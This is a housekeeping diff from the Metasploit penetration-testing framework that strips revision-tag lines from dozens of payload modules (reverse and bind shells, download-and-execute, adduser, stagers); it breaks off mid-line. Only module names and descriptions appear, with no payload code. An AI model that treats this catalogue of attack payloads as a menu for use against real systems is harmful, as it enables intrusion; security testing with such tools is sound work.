a/modules/payloads/singles/php/bind_php.rb +++ b/modules/payloads/singles/php/bind_php.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'PHP Command Shell, Bind TCP (via PHP)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell via php', 'Author' => ['egypt', 'diaul ',], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/php/bind_php_ipv6.rb b/modules/payloads/singles/php/bind_php_ipv6.rb index 7f8c8a3f01..8a3c4c6eef 100644 --- a/modules/payloads/singles/php/bind_php_ipv6.rb +++ b/modules/payloads/singles/php/bind_php_ipv6.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'PHP Command Shell, Bind TCP (via php) IPv6', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell via php (IPv6)', 'Author' => ['egypt', 'diaul ',], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/php/download_exec.rb b/modules/payloads/singles/php/download_exec.rb index 7c8430769f..4cea94c7a1 100644 --- a/modules/payloads/singles/php/download_exec.rb +++ b/modules/payloads/singles/php/download_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'PHP Executable Download and Execute', - 'Version' => '$Revision$', 'Description' => 'Download an EXE from an HTTP URL and execute it', 'Author' => [ 'egypt' ], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/php/exec.rb b/modules/payloads/singles/php/exec.rb index 313332e92e..70d0e1a243 100644 --- a/modules/payloads/singles/php/exec.rb +++ b/modules/payloads/singles/php/exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'PHP Execute Command ', - 'Version' => '$Revision$', 'Description' => 'Execute a single system command', 'Author' => [ 'egypt' ], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb index 58a61aee6a..e7c10347a0 100644 --- a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'PHP Meterpreter, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a Meterpreter server (PHP)', 'Author' => ['egypt'], 'Platform' => 'php', diff --git a/modules/payloads/singles/php/reverse_perl.rb b/modules/payloads/singles/php/reverse_perl.rb index 75688bdf78..8e22900208 100644 --- a/modules/payloads/singles/php/reverse_perl.rb +++ b/modules/payloads/singles/php/reverse_perl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'PHP Command, Double reverse TCP connection (via Perl)', - 'Version' => '$Revision$', 'Description' => 'Creates an interactive shell via perl', 'Author' => 'cazz', 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/php/reverse_php.rb b/modules/payloads/singles/php/reverse_php.rb index 5fae8bcbea..e5bc0f9485 100644 --- a/modules/payloads/singles/php/reverse_php.rb +++ b/modules/payloads/singles/php/reverse_php.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'PHP Command Shell, Reverse TCP (via PHP)', - 'Version' => '$Revision$', 'Description' => 'Reverse PHP connect back shell with checks for disabled functions', 'Author' => 'egypt', 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/php/shell_findsock.rb b/modules/payloads/singles/php/shell_findsock.rb index ba3c7fb083..5c7c227649 100644 --- a/modules/payloads/singles/php/shell_findsock.rb +++ b/modules/payloads/singles/php/shell_findsock.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'PHP Command Shell, Find Sock', - 'Version' => '$Revision$', 'Description' => %Q{ Spawn a shell on the established connection to the webserver. Unfortunately, this payload diff --git a/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb b/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb index 5aab5f3a84..92b7ab8c2c 100644 --- a/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb +++ b/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Solaris Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'vlad902', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/solaris/sparc/shell_find_port.rb b/modules/payloads/singles/solaris/sparc/shell_find_port.rb index 3d361678b6..47d3ea35e8 100644 --- a/modules/payloads/singles/solaris/sparc/shell_find_port.rb +++ b/modules/payloads/singles/solaris/sparc/shell_find_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Solaris Command Shell, Find Port Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection', 'Author' => 'vlad902', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb b/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb index 1e5a384995..27eb565091 100644 --- a/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Solaris Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'vlad902', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb b/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb index 9218fc75a2..c6138aa319 100644 --- a/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Solaris Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/solaris/x86/shell_find_port.rb b/modules/payloads/singles/solaris/x86/shell_find_port.rb index fcc52be04a..aa71ce0b0c 100644 --- a/modules/payloads/singles/solaris/x86/shell_find_port.rb +++ b/modules/payloads/singles/solaris/x86/shell_find_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Solaris Command Shell, Find Port Inline', - 'Version' => '$Revision$', 'Description' => 'Spawn a shell on an established connection', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb b/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb index 902b13812c..52b8a02417 100644 --- a/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Solaris Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'Ramon de C Valle', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/tty/unix/interact.rb b/modules/payloads/singles/tty/unix/interact.rb index 6ae32bb7ab..a9208f52d3 100644 --- a/modules/payloads/singles/tty/unix/interact.rb +++ b/modules/payloads/singles/tty/unix/interact.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Unix TTY, Interact with Established Connection', - 'Version' => '$Revision$', 'Description' => 'Interacts with a TTY on an established socket connection', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/windows/adduser.rb b/modules/payloads/singles/windows/adduser.rb index 7139491a44..47248dda3c 100644 --- a/modules/payloads/singles/windows/adduser.rb +++ b/modules/payloads/singles/windows/adduser.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'Windows Execute net user /ADD', - 'Version' => '$Revision$', 'Description' => %q{ Create a new user and add them to local administration group. diff --git a/modules/payloads/singles/windows/dns_txt_query_exec.rb b/modules/payloads/singles/windows/dns_txt_query_exec.rb index bb897820ad..213ff6dcf3 100644 --- a/modules/payloads/singles/windows/dns_txt_query_exec.rb +++ b/modules/payloads/singles/windows/dns_txt_query_exec.rb @@ -21,7 +21,6 @@ module Metasploit3 'corelanc0d3r ' ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Platform' => 'win', 'Arch' => ARCH_X86 )) diff --git a/modules/payloads/singles/windows/download_exec.rb b/modules/payloads/singles/windows/download_exec.rb index f95350f237..cef4369431 100644 --- a/modules/payloads/singles/windows/download_exec.rb +++ b/modules/payloads/singles/windows/download_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ module Metasploit3 'corelanc0d3r ' ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Platform' => 'win', 'Arch' => ARCH_X86 )) diff --git a/modules/payloads/singles/windows/exec.rb b/modules/payloads/singles/windows/exec.rb index 416d8aa9a9..6993dfe898 100644 --- a/modules/payloads/singles/windows/exec.rb +++ b/modules/payloads/singles/windows/exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ require 'msf/core/payload/windows/exec' ### module Metasploit3 - # $Revision$ include Msf::Payload::Windows::Exec end diff --git a/modules/payloads/singles/windows/loadlibrary.rb b/modules/payloads/singles/windows/loadlibrary.rb index 860dc6aad2..c1be8a48d2 100644 --- a/modules/payloads/singles/windows/loadlibrary.rb +++ b/modules/payloads/singles/windows/loadlibrary.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ require 'msf/core/payload/windows/loadlibrary' ### module Metasploit3 - # $Revision$ include Msf::Payload::Windows::LoadLibrary end diff --git a/modules/payloads/singles/windows/messagebox.rb b/modules/payloads/singles/windows/messagebox.rb index fff67d8c5b..7aca7e92aa 100644 --- a/modules/payloads/singles/windows/messagebox.rb +++ b/modules/payloads/singles/windows/messagebox.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ module Metasploit3 'jduck' # some ruby factoring ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Platform' => 'win', 'Arch' => ARCH_X86 )) diff --git a/modules/payloads/singles/windows/metsvc_bind_tcp.rb b/modules/payloads/singles/windows/metsvc_bind_tcp.rb index fbaae49c2b..e3716440c0 100644 --- a/modules/payloads/singles/windows/metsvc_bind_tcp.rb +++ b/modules/payloads/singles/windows/metsvc_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Meterpreter Service, Bind TCP', - 'Version' => '$Revision$', 'Description' => 'Stub payload for interacting with a Meterpreter Service', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/windows/metsvc_reverse_tcp.rb b/modules/payloads/singles/windows/metsvc_reverse_tcp.rb index e38dccda52..8c454fae4b 100644 --- a/modules/payloads/singles/windows/metsvc_reverse_tcp.rb +++ b/modules/payloads/singles/windows/metsvc_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Meterpreter Service, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Stub payload for interacting with a Meterpreter Service', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/windows/shell_bind_tcp.rb b/modules/payloads/singles/windows/shell_bind_tcp.rb index 2cbf8ac1a1..3322a3c5e1 100644 --- a/modules/payloads/singles/windows/shell_bind_tcp.rb +++ b/modules/payloads/singles/windows/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell', 'Author' => [ 'vlad902', 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb b/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb index 3d50926eca..01901df2b1 100644 --- a/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb +++ b/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Disable Windows ICF, Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Disable the Windows ICF, then listen for a connection and spawn a command shell', 'Author' => 'Lin0xx ', 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/windows/shell_reverse_tcp.rb b/modules/payloads/singles/windows/shell_reverse_tcp.rb index 2ab9e39974..a8ce243c83 100644 --- a/modules/payloads/singles/windows/shell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => [ 'vlad902', 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/windows/speak_pwned.rb b/modules/payloads/singles/windows/speak_pwned.rb index c2fac0b282..e49248c325 100644 --- a/modules/payloads/singles/windows/speak_pwned.rb +++ b/modules/payloads/singles/windows/speak_pwned.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -52,7 +48,6 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'Windows Speech API - Say "You Got Pwned!"', - 'Version' => '$Revision$', 'Description' => 'Causes the target to say "You Got Pwned" via the Windows Speech API', 'Author' => [ 'Berend-Jan "SkyLined" Wever ' ], 'License' => BSD_LICENSE, diff --git a/modules/payloads/singles/windows/x64/exec.rb b/modules/payloads/singles/windows/x64/exec.rb index 78910cbbc4..f4c4c6bad5 100644 --- a/modules/payloads/singles/windows/x64/exec.rb +++ b/modules/payloads/singles/windows/x64/exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows x64 Execute Command', - 'Version' => '$Revision$', 'Description' => 'Execute an arbitrary command (Windows x64)', 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/windows/x64/loadlibrary.rb b/modules/payloads/singles/windows/x64/loadlibrary.rb index 5129d1e089..0bf3965f68 100644 --- a/modules/payloads/singles/windows/x64/loadlibrary.rb +++ b/modules/payloads/singles/windows/x64/loadlibrary.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows x64 LoadLibrary Path', - 'Version' => '$Revision$', 'Description' => 'Load an arbitrary x64 library path', 'Author' => [ 'scriptjunkie', 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/windows/x64/shell_bind_tcp.rb b/modules/payloads/singles/windows/x64/shell_bind_tcp.rb index fc3f777b03..9234348a01 100644 --- a/modules/payloads/singles/windows/x64/shell_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows x64 Command Shell, Bind TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection and spawn a command shell (Windows x64)', 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb b/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb index e0bbdb258e..1273392260 100644 --- a/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Windows x64 Command Shell, Reverse TCP Inline', - 'Version' => '$Revision$', 'Description' => 'Connect back to attacker and spawn a command shell (Windows x64)', 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb b/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb index 9f6edc9f56..54d28de9fa 100644 --- a/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager (IPv6)', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection over IPv6', 'Author' => ['skape', 'vlad902', 'hdm'], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/bsd/x86/bind_tcp.rb b/modules/payloads/stagers/bsd/x86/bind_tcp.rb index a505de6a99..715d5aae55 100644 --- a/modules/payloads/stagers/bsd/x86/bind_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/bsd/x86/find_tag.rb b/modules/payloads/stagers/bsd/x86/find_tag.rb index dd59f206ee..7bbe5db2ec 100644 --- a/modules/payloads/stagers/bsd/x86/find_tag.rb +++ b/modules/payloads/stagers/bsd/x86/find_tag.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Find Tag Stager', - 'Version' => '$Revision$', 'Description' => 'Use an established connection', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb index cc2bbfcf61..8fa290acf6 100644 --- a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager (IPv6)', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker over IPv6', 'Author' => ['skape', 'vlad902', 'hdm'], 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/bsd/x86/reverse_tcp.rb b/modules/payloads/stagers/bsd/x86/reverse_tcp.rb index d7a8582032..1e52219699 100644 --- a/modules/payloads/stagers/bsd/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/bsdi/x86/bind_tcp.rb b/modules/payloads/stagers/bsdi/x86/bind_tcp.rb index 8b2f096a09..6498a1d2aa 100644 --- a/modules/payloads/stagers/bsdi/x86/bind_tcp.rb +++ b/modules/payloads/stagers/bsdi/x86/bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb b/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb index efa641defc..a4f81f0af9 100644 --- a/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker', 'Author' => 'skape', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/java/bind_tcp.rb b/modules/payloads/stagers/java/bind_tcp.rb index 84a06fe4f9..81f4c26e70 100644 --- a/modules/payloads/stagers/java/bind_tcp.rb +++ b/modules/payloads/stagers/java/bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Java Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection', 'Author' => [ 'mihi', # all the hard work diff --git a/modules/payloads/stagers/java/reverse_http.rb b/modules/payloads/stagers/java/reverse_http.rb index b5cd04548e..04a8e33ef4 100644 --- a/modules/payloads/stagers/java/reverse_http.rb +++ b/modules/payloads/stagers/java/reverse_http.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Java Reverse HTTP Stager', - 'Version' => '$Revision$', 'Description' => 'Tunnel communication over HTTP', 'Author' => [ 'mihi', # all the hard work diff --git a/modules/payloads/stagers/java/reverse_https.rb b/modules/payloads/stagers/java/reverse_https.rb index 896cccf489..173abe2a11 100644 --- a/modules/payloads/stagers/java/reverse_https.rb +++ b/modules/payloads/stagers/java/reverse_https.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Java Reverse HTTPS Stager', - 'Version' => '$Revision$', 'Description' => 'Tunnel communication over HTTPS', 'Author' => [ 'mihi', # all the hard work diff --git a/modules/payloads/stagers/java/reverse_tcp.rb b/modules/payloads/stagers/java/reverse_tcp.rb index 809ae34114..fda226b792 100644 --- a/modules/payloads/stagers/java/reverse_tcp.rb +++ b/modules/payloads/stagers/java/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Java Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect back stager', 'Author' => [ 'mihi', # all the hard work diff --git a/modules/payloads/stagers/linux/x64/bind_tcp.rb b/modules/payloads/stagers/linux/x64/bind_tcp.rb index 54d91f05ef..875e86c5b2 100644 --- a/modules/payloads/stagers/linux/x64/bind_tcp.rb +++ b/modules/payloads/stagers/linux/x64/bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Listen for a connection', 'Author' => 'ricky', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/linux/x64/reverse_tcp.rb b/modules/payloads/stagers/linux/x64/reverse_tcp.rb index d7f7c3fa8e..6a7604afd0 100644 --- a/modules/payloads/stagers/linux/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x64/reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,6 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager', - 'Version' => '$Revision$', 'Description' => 'Connect back to the attacker', 'Author' => 'ricky', 'License' => MSF_LICENSE, diff --git a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb index c45ffaceb5..d4da6df25b 100644 --- a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial 